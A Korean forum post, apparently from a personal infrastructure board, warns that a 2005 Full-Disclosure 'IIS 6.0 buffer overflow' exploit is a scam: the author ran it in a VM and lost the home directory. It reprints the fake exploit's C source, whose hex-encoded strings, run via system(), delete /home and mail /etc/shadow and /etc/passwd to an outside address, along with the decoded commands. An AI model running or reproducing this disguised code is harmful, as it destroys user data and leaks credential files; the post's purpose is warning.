메뉴 건너뛰기

infra

[사기] iis 6.0 쉘 입수 코드로 속인 페이지

suritam92013.07.26 02:21조회 수 1242댓글 0

    • 글자 크기

http://seclists.org/fulldisclosure/2005/Apr/451


IIS 6.0의 취약점을 이용해 쉘을 얻을 수 있는 코드라고 해서 TEST 해 봤는데, home 디렉터리만 날렸다.


이런 사기 코드에 당하다니 미치겠다. 쩝.


메일은 가지 않았으나, 사용자 디렉터리가 모두 삭제되어 기분이 나쁘다.


다행이 vmware 에서 실행되서 백업 이미지가 있긴 하지만, 조심해야겠다.


http://lists.grok.org.uk/pipermail/full-disclosure/2005-April/033472.html

THIS ADVISORY IS FALSE!!!!!!!!!!!!!!!!!!!!!!!

"shellcode" is decoded to be:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe

"launcher" is decoded to be:
cat /etc/shadow |mail full-disclosure at lists.grok.org.uk

"netcat_shell" is decoded to be:
cat /etc/passwd |mail full-disclosure at lists.grok.org.uk


Day Jay wrote:
> /* Proof of concept code
>    Please don't send us e-mails
>    asking us "how to hack" because
>    we will be forced to skullfsck you.
> 
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
> 
>    IIS 6 Buffer Overflow Exploit
> 
>    BUG: inetinfo.exe improperly bound checks
>    http requests sent longer than 6998 chars.
>    Can get messy but enough testing, and we have
>    found a way in.
> 
>    VENDOR STATUS: Notified
>    FIX: In process
> 
>    Remote root.
> 
>    eg.
>    #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
>     + Connecting to host...
>     + Connected.
>     + Inserting Shellcode...
>     + Done...
>     + Spawining shell..
> 
>     Microsoft Windows XP [Version 5.1.2600]
>    (C) Copyright 1985-2001 Microsoft Corp.
>    C:>
> 
> 
> 
> */
> char shellcode[] =
> "x2fx62x69x6ex2fx72x6dx20"
> "x2dx72x66x20x2fx68x6fx6d"
> "x65x2fx2ax3bx63x6cx65x61"
> "x72x3bx65x63x68x6fx20x62"
> "x6cx34x63x6bx68x34x74x2c"
> "x68x65x68x65";
> 
> char launcher [] =
> "x63x61x74x20x2fx65x74x63x2fx73"
> "x68x61x64x6fx77x20x7cx6dx61x69"
> "x6cx20x66x75x6cx6cx2dx64x69"
> "x73x63x6cx6fx73x75x72x65x40"
> "x6cx69x73x74x73x2ex67x72x6fx6b"
> "x2ex6fx72x67x2ex75x6bx20";
> 
> char netcat_shell [] =
> "x63x61x74x20x2fx65x74x63x2fx70"
> "x61x73x73x77x64x20x7cx6dx61x69"
> "x6cx20x66x75x6cx6cx2dx64x69"
> "x73x63x6cx6fx73x75x72x65x40"
> "x6cx69x73x74x73x2ex67x72x6fx6b"
> "x2ex6fx72x67x2ex75x6bx20";
> 
> 
> main()
> {
> 
> //Section Initialises designs implemented by mexicans
> //Imigrate
> system(launcher);
> system(netcat_shell);
> system(shellcode);
> 
> //int socket = 0;
> //double long port = 0.0;
> 
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
> 
>  //     for(int j; j < 30; j++)
>         {
>         //Find socket remote address fault
>         printf(".");
>         }
> //overtake inetinfo here IIS_666666^
> return 0;
> }
> 
> 
> 
> 
> 		
> __________________________________ 
> Do you Yahoo!? 
> Plan great trips with Yahoo! Travel: Now over 17,000 guides!
> http://travel.yahoo.com/p-travelguide
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
suritam9 (비회원)
    • 글자 크기
[iptable] 서버로 유입되는 포트 리다이렉션 (by suritam9) [mysql] 인코딩 변경 (by suritam9)

댓글 달기

박영식
2012.03.24 조회 2047
suritam9
2012.07.06 조회 3065
suritam9
2012.07.06 조회 2210
suritam9
2012.10.04 조회 2254
suritam9
2013.05.05 조회 3781
suritam9
2013.09.05 조회 3239
첨부 (0)
위로